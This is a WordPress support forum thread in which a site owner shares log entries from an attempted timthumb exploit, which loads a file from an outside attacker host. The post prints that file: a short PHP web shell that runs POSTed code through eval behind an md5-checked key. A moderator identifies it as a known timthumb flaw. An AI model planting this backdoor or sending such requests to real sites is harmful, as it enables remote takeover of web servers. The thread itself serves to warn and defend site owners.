WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] New Hack Attempt on Self Hosted WordPress Site!! (5 posts)

  1. pinchii
    Member
    Posted 2 years ago #

    Got this in my "hack prevention" scripts that I have running on the site

    Remote Address:91.224.160.182
    Remote Port:47762
    Request Method:GET
    Referer:
    Query String:
    Request URI:/home/wp-content/themes/mystique/thumb.php?src=http://blogger.com.bloggera.net/images.php
    User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62

    And also

    Remote Address:91.224.160.182
    Remote Port:47764
    Request Method:GET
    Referer:
    Query String:
    Request URI:/home/wp-content/themes/mystique/timthumb.php?src=http://blogger.com.bloggera.net/images.php
    User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62

    The content of the File "images.php" is

    ::::BINARY CODE PAYLOAD::::
    <?php
    if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
    $cmd = $_POST["code"];
    eval (stripslashes($cmd));
    }
    ?>

    Looks like they are trying to gain CMD on my Apache server

    If you guys are getting the same, I suggest you block PHP files in your wp-content folder

    I posted the same thing on my blog along with what the image that ::::binary code payload:::: actually looks like, look towards the bottom
    http://pinchii.com/home/2011/08/hack-attempt-on-pinchii-com/

  2. esmi
    Forum Moderator
    Posted 2 years ago #

    It's not new. They're trying to use a known issue with older versions of timthumb.

  3. pinchii
    Member
    Posted 2 years ago #

    really, i searched google and didnt find anything

    better safe then sorry i guess :)

  4. pinchii
    Member
    Posted 2 years ago #

  5. That'd be the one :/

Topic Closed

This topic has been closed to new replies.

About this Topic